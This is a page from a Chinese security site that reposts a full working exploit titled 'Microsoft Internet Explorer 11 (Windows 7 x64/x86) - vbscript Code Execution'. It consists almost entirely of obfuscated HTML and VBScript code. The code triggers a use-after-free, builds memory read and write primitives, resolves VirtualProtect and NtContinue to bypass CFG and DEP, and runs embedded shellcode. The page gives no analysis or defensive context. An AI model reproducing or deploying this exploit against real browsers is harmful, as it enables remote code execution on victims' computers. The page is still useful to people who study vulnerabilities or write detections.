首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution
来源:vfocus.net 作者:smgorelik 发布时间:2018-05-28  

<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="vbscript">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr

IlII=195948557
lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
IllI=195890093
Function IIIII(Domain)
 lIlII=0
 IllllI=0
 IIlIIl=0
 Id=CLng(Rnd*1000000)
 lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
 If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
  lIlII=lIlII-(&h86d+6447-&H219b)
 End If

 IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
 IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
 IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
End Function

Function lIIII(ByVal lIlIl)
 IIll=""
 For index=0 To Len(lIlIl)-1
  IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
 Next
 IIll=IIll &"00"
 If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
  IIll=IIll &"00"
 End If
 For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
  lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
  lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
  lIIII=lIIII &"%u" &lIlIll &lIIIlI
 Next
End Function
Function lIlI(ByVal Number,ByVal Length)
 IIII=Hex(Number)
 If Len(IIII)<Length Then
  IIII=String(Length-Len(IIII),"0") &IIII    'pad allign with zeros
 Else
  IIII=Right(IIII,Length)
 End If
 lIlI=IIII
End Function
Function GetUint32(lIII)
 Dim value
 llll.mem(IlII+8)=lIII+4
 llll.mem(IlII)=8  'type string
 value=llll.P0123456789
 llll.mem(IlII)=2
 GetUint32=value
End Function
Function IllIIl(lIII)
 IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
 lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
 llll.mem(IlII)=(&h713+3616-&H1530)
 GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
 llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
 On Error Resume Next
 Dim lllll
 lllll=llllll
 lllll=null
 SetMemValue lllll
 LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
 Dim llIl
 llIl=IllIll And &hffff0000
 Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
  llIl=llIl-65536
 Loop
 GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
 Dim lIIlI,IIIl
 lIIlI=""
 For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
  lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
 Next
 StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
 Dim import_rva,nt_header,descriptor,import_dir
 Dim IIIIII
 nt_header=GetUint32(base_address+(&h3c))
 import_rva=GetUint32(base_address+nt_header+&h80)
 import_dir=base_address+import_rva
 descriptor=0
 Do While True
  Dim Name
  Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
  If Name=0 Then
   GetBaseFromImport=&hBAAD0000
   Exit Function
  Else
   If StrCompWrapper(base_address+Name,name_input)=0 Then
    Exit Do
   End If
  End If
  descriptor=descriptor+1
 Loop
 IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
 GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function

Function GetProcAddr(dll_base,name)
 Dim p,export_dir,index
 Dim function_rvas,function_names,function_ordin
 Dim Illlll
 p=GetUint32(dll_base+&h3c)
 p=GetUint32(dll_base+p+&h78)
 export_dir=dll_base+p

 function_rvas=dll_base+GetUint32(export_dir+&h1c)
 function_names=dll_base+GetUint32(export_dir+&h20)
 function_ordin=dll_base+GetUint32(export_dir+&h24)
 index=0
 Do While True
  Dim lllI
  lllI=GetUint32(function_names+index*4)
  If StrCompWrapper(dll_base+lllI,name)=0 Then
   Exit Do
  End If
  index=index+1
 Loop
 Illlll=IllIIl(function_ordin+index*2)
 p=GetUint32(function_rvas+Illlll*4)
 GetProcAddr=dll_base+p
End Function

Function GetShellcode()
 IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100%u0065%u0000%u0000%u0000%u0000%u0000%ucc00%ucccc%ucccc%ucccc%ucccc" &lIIII(IIIII("")))
 IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
 GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
 Dim High,Low
 High=lIlI((value And &hffff0000)/&h10000,4)
 Low=lIlI(value And &hffff,4)
 EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lIllIl
 Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
 IlllI=lIlI(NtContinueAddr,8)
 IlIII=Mid(IlllI,1,2)
 llllI=Mid(IlllI,3,2)
 llIII=Mid(IlllI,5,2)
 lIllI=Mid(IlllI,7,2)
 IIlI=""
 IIlI=IIlI &"%u0000%u" &lIllI &"00"
 For IIIl=1 To 3
  IIlI=IIlI &"%u" &llllI &llIII
  IIlI=IIlI &"%u" &lIllI &IlIII
 Next
 IIlI=IIlI &"%u" &llllI &llIII
 IIlI=IIlI &"%u00" &IlIII
 lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
 Dim IIlI
 IIlI=String((100334-65536),Unescape("%u4141"))
 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
 IIlI=IIlI &EscapeAddress(&h3000)
 IIlI=IIlI &EscapeAddress(&h40)
 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
 IIlI=IIlI &String(6,Unescape("%u4242"))
 IIlI=IIlI &lIllIl()
 IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
 WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
 Dim IIlI
 Dim lllllI
 lllllI=lIlll+&h23
 IIlI=""
 IIlI=IIlI &EscapeAddress(lllllI)
 IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
 IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
 IIlI=IIlI &EscapeAddress(&h1b)
 IIlI=IIlI &EscapeAddress(0)
 IIlI=IIlI &EscapeAddress(lIlll)
 IIlI=IIlI &EscapeAddress(&h23)
 IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
 ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
 llll.mem(IlII)=&h4d 'DEP bypass
 llll.mem(IlII+8)=0
    msgbox(IlII)  'VT replaced
End Sub

Class cla1
Private Sub Class_Terminate()
 Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
 IllI=IllI+(&h14b5+2725-&H1f59)
 lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub

End Class

Class cla2
Private Sub Class_Terminate()
 Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
 IllI=IllI+(&h880+542-&Ha9d)
 lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class

Class IIIlIl
End Class

Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
 mem=Value
 SetProp=0
End Function
End Class

Class IIIlll
Dim mem
Function P0123456789
 P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class

Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
 IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
 Set IIIlI(IIIl)=llII
Next
End Property
End Class

Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
 IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
 Set IllII(IIIl)=llII
Next
End Property
End Class

Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
 For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
  Set IIllI(IIIl)=New IIIlIl
 Next
 For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
  Set IIllI(IIIl)=New llIIl
 Next
 IllI=0
 For IIIl=0 To 6
  ReDim lIIl(1)
  Set lIIl(1)=New cla1
  Erase lIIl
 Next
 Set llll=New llIIl
 IllI=0
 For IIIl=0 To 6
  ReDim lIIl(1)
  Set lIIl(1)=New cla2
  Erase lIIl
 Next
 Set IIIIl=New llIIl
End Sub
Sub InitObjects
 llll.SetProp(llllIl)
 IIIIl.SetProp(IlIIII)
 IlII=IIIIl.mem
End Sub

Sub StartExploit
 UAF
 InitObjects
 vb_adrr=LeakVBAddr()
 Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
 vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
 Alert "VBScript Base: 0x" & Hex(vbs_base)
 msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
 Alert "MSVCRT Base: 0x" & Hex(msv_base)
 krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
 Alert "KernelBase Base: 0x" & Hex(krb_base)
 ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
 Alert "Ntdll Base: 0x" & Hex(ntd_base)
 VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
 Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
 NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
 Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr)
 SetMemValue GetShellcode()
 ShellcodeAddr=GetMemValue()+8
 Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
 lIlll=GetMemValue()+69596
 SetMemValue ExpandWithVirtualProtect(lIlll)
 llIIll=GetMemValue()
 Alert "Executing Shellcode"
 ExecuteShellcode
End Sub
StartExploit
</script>
</body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Siemens SCALANCE S613 - Remote
·GNU glibc < 2.27 - Local Buffe
·FTPShell Server 6.80 - Denial
·FTPShell Server 6.80 - Buffer
·Linux 4.4.0 < 4.4.0-53 - AF_PA
·AMD / ARM / Intel - Speculativ
·Microsoft Edge Chakra JIT - Ma
·Siemens SIMATIC S7-1500 CPU -
·Adobe Experience Manager (AEM)
·R 3.4.4 - Local Buffer Overflo
·Linux 2.6.30 < 2.6.36-rc8 - Re
·GitBucket 4.23.1 - Remote Code
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved